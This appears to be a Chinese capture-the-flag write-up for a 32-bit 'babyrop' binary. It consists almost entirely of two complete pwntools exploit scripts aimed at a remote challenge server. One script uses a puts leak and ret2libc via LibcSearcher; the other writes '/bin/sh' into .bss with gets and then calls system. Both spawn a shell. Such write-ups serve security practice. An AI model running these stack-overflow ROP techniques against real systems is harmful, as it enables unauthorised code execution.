有两个思路 一个打ret2libc
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='i386', os='linux')
pwnfile= './babyrop'
# io = process(pwnfile)
io = remote('1.14.71.254',28745 )
elf = ELF(pwnfile)
rop = ROP(pwnfile)
padding = 0x28+0x04
puts_got = elf.got['puts']
puts_plt = elf.plt['puts'] #注意如果plt跟got表相等 那就是存在endbr保护 记得在ida中仔细查看
return_addr = elf.sym['main']
print("puts_got: "+hex(puts_got))
print("puts_plt: "+hex(puts_plt))
print("return_addr: "+hex(return_addr))
payload = flat([b'a'* padding , puts_plt , return_addr , puts_got])
delimiter = 'Can you give me some advise?\n'
io.sendlineafter(delimiter, payload)
puts_addr = u32(io.recvuntil(b'\xf7')[-4:])
# puts_got_addr = u32(io.recv(4))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_addr = libc_base + libc.dump('str_bin_sh')
print('puts_addr:',hex(puts_addr))
print('libc_base:',hex(libc_base))
print('system_addr:',hex(system_addr))
print('bin_addr:',hex(bin_addr))
payload2 = b'a'* (padding)+p32(system_addr)+p32(return_addr)+p32(bin_addr)
delimiter = 'Can you give me some advise?\n'
io.sendlineafter(delimiter, payload2)
io.interactive()
另外一个是用get获取到一个/bin/sh然后再跳转到system中去
from pwn import *
context(log_level='debug',arch='i386', os='linux')
pwnfile= './babyrop'
# io = process(pwnfile)
io = remote('1.14.71.254',28745 )
elf = ELF(pwnfile)
rop = ROP(pwnfile)
bss_addr = 0x0804A028
sys_plt = elf.sym['system']
gets_plt = elf.sym['gets']
io.recvuntil("advise?")
payload = b'a'*(0x28+4) + p32(gets_plt) + p32(sys_plt) + p32(bss_addr) + p32(bss_addr)
io.sendline(payload)
payload = b"/bin/sh"
io.sendline(payload)
io.interactive()
加载中...